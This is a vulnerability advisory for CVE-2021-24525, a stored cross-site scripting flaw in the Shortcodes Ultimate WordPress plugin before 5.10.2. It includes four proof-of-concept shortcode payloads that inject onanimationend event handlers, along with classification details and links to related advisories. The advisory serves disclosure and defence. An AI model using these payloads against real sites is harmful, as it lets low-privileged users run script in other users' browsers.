WordPress Plugin Vulnerabilities

Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS

Description

The plugin allows users with Contributor roles to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some do escape, most don't, and there are even some attributes that are insecure by design (like [su_button]'s onclick attribute).

Proof of Concept

[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']

Affects Plugins

Plugin icon
shortcodes-ultimate
Fixed in 5.10.2

References

CVE
CVE-2021-24525

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.8 (medium)

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
7f5659bd-50c3-4725-95f4-cf88812acf1c

Timeline

Publicly Published
2021-08-23 (about 2 years ago)
Added
2021-08-23 (about 2 years ago)
Last Updated
2022-03-07 (about 2 years ago)

Other

Published
Title
Published
2023-01-17
Title
OOPSpam Anti-Spam < 1.1.36 - Admin+ Stored XSS
Published
2023-09-25
Title
PageLayer < 1.7.8 - Author+ Stored XSS
Published
2014-08-01
Title
Blooog 1.1 - jplayer.swf Cross Site Scripting
Published
2015-02-22
Title
Google Doc Embedder <= 2.5.18 - Cross-Site Scripting (XSS)
Published
2015-05-12
Title
Auberge Theme <= 1.4.4 - DOM Cross-Site Scripting (XSS)